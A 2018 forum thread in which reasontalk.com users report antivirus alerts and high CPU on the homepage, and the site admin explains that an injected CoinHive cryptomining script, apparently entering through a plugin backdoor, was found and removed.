Sophos Detecing Malware

List your suggestions here for the reasontalk.com website (not Reason feature requests)!
Forum rules
Keep in mind that this forum is for Reasontalk.com suggestions, and not for support on your Reason Studios software.
Post Reply
User avatar
DinoJ
Posts: 72
Joined: 22 Jan 2015
Location: UK

28 Sep 2018

Hi,

Just wanted to mention that during the last week, whenever I go to the main Reasontalk page before going to the forum, my Sophos AntiVirus says it is blocking Malware (See screenshot). Not sure what this is, or if it a false positive but just in case thought I would bring this to your attention.

Kind Regards,

DinoJ
Attachments
Reasontalk AV.png
Screenshot of it happening.
Reasontalk AV.png (919.79 KiB) Viewed 3363 times

User avatar
Zac
Posts: 1784
Joined: 19 May 2016
Contact:

28 Oct 2018

I'm slightly surprised this hasnt been responded to... sophos is legit and well established.

Surely this guy deserves a reply...?

WongoTheSane
Moderator
Posts: 1851
Joined: 14 Sep 2015
Location: Paris, France

29 Oct 2018

It should be resolved by now:

viewtopic.php?p=415966#p415966

...but if you still find anything suspicious, please report, it helps!

User avatar
DinoJ
Posts: 72
Joined: 22 Jan 2015
Location: UK

02 Nov 2018

@Zac Thanks for the bump! Yeah Sophos is the AV we use at my work and it is really good, I may have just jinxed myself by saying this but we had far less issues with viruses and malware in the last two years since we switched to this. Excluding the few users who insist on clicking links promising them tax refunds or opening attachments from people/organisations they don't know! But can't blame Sophos for not being able to protect against PEBCAK/PICNIC :lol:

@WongoTheSane Thanks for the response and update, I can confirm Sophos no longer grumbles when I visit your site :)

User avatar
DinoJ
Posts: 72
Joined: 22 Jan 2015
Location: UK

19 Nov 2018

Just to report, the malware detection on Reasontalk main page has returned today, this time it also triggering Malwarebytes as well as Sophos (See Screenshot).

Reasontalk Malware.png
Reasontalk Malware.png (690.01 KiB) Viewed 2975 times

User avatar
rcbuse
RE Developer
Posts: 1175
Joined: 16 Jan 2015
Location: SR388
Contact:

19 Nov 2018

Could be that the landing page is running bitcoin scripts from https://coinhive.com/. I'm seeing 100% cpu on all my cores when I load reasontalk.com

User avatar
Emian
Posts: 712
Joined: 16 Jan 2015

20 Nov 2018

rcbuse wrote:
19 Nov 2018
Could be that the landing page is running bitcoin scripts from https://coinhive.com/. I'm seeing 100% cpu on all my cores when I load reasontalk.com
my virusscanner still blocks a coinhive site when comming here...


"i might be established, but i'll never be establishement "
- Dave Clarke -www.soundcloud.com/emian

User avatar
Zac
Posts: 1784
Joined: 19 May 2016
Contact:

20 Nov 2018

Should i worry about this? Is this an internal issue, i.e. put in place by the site owner or some external hack?

User avatar
Creativemind
Posts: 4875
Joined: 17 Jan 2015
Location: Stoke-On-Trent, England, UK

20 Nov 2018

Yeah my Avast anti-virus is too.
Attachments
Reasontalk Threat.PNG
Reasontalk Threat.PNG (18.06 KiB) Viewed 2908 times
Last edited by Creativemind on 20 Nov 2018, edited 2 times in total.
:reason:

Reason Studio's 11.3 / Cockos Reaper 6.82 / Cakewalk By Bandlab / Orion 8.6
http://soundcloud.com/creativemind75/iv ... soul-mix-3

User avatar
Adabler
Competition Winner
Posts: 496
Joined: 05 Oct 2017
Location: Oslo

20 Nov 2018

Strange. I am using firefox with tracking blocking, avast and adblock but I do not see any changes to cpu load when accessing reasontalk.com. I don't see exactly what adblock is blocking, could it be a dodgy ad causing this?
:reason: 12, Win10

avasopht
Competition Winner
Posts: 3932
Joined: 16 Jan 2015

20 Nov 2018

If you're not running regular (or even automatic) updates on forum and CMS you probably got hacked and had malware installed.

You might also want to double check the theme you've installed. Maybe that also opened a backdoor.

User avatar
MikeMcKew
Moderator
Posts: 199
Joined: 16 Aug 2017
Location: Leesburg, VA
Contact:

20 Nov 2018

Thank you everyone, for bringing this to our attention. If anyone else has reports, please continue to post them here. We are looking into this issue and hope to resolve it as quickly as possible.

User avatar
nickb523
RE Developer
Posts: 427
Joined: 23 Jan 2017
Location: Fife, Scotland
Contact:

20 Nov 2018

I'm seeing the same thing as Panda - pinned 100% cpu on the homepage.

A quick look at the homepage source code tells me that you have indeed been hacked. Something is going on with https://coinhive.com/.

I can sort this out so if you need assistance just give me a shout. :)

Nick

User avatar
Adabler
Competition Winner
Posts: 496
Joined: 05 Oct 2017
Location: Oslo

20 Nov 2018

nickb523 wrote:
20 Nov 2018
I'm seeing the same thing as Panda - pinned 100% cpu on the homepage.
A quick look at the homepage source code tells me that you have indeed been hacked. Something is going on with https://coinhive.com/.
Do you know why something like this only seem to affect some users? What would be considered good practice on our end?
:reason: 12, Win10

User avatar
Kenni
Site Admin
Posts: 1245
Joined: 02 Jun 2015
Location: Copenhagen, Denmark
Contact:

21 Nov 2018

So again, the CoinHive hack hit us.

Basically, "someone" injects a single line of javascript into the theme code, loading a CoinHive miner in the background, thus using visitors CPU to crypto-mine for them (Monero) while the site is open.

It's important for me to stress that this doesn't infect visitors with a virus or anything of the sorts, it simply "just" calculates hashes while the site is open!

I've identified which plugin might have opened a backdoor, and cleared it of malicious code. The site doesn't have the CoinHive shortlink anymore and the issue should be resolved.

Please bump this thread and keep reporting if you see the issue coming back!
Kenni Andruszkow
SoundCloud

User avatar
Zac
Posts: 1784
Joined: 19 May 2016
Contact:

22 Nov 2018

Kenni wrote:
21 Nov 2018
So again, the CoinHive hack hit us.

Basically, "someone" injects a single line of javascript into the theme code, loading a CoinHive miner in the background, thus using visitors CPU to crypto-mine for them (Monero) while the site is open.

It's important for me to stress that this doesn't infect visitors with a virus or anything of the sorts, it simply "just" calculates hashes while the site is open!

I've identified which plugin might have opened a backdoor, and cleared it of malicious code. The site doesn't have the CoinHive shortlink anymore and the issue should be resolved.

Please bump this thread and keep reporting if you see the issue coming back!
Thanks for the fix.

Post Reply
  • Information
  • Who is online

    Users browsing this forum: No registered users and 2 guests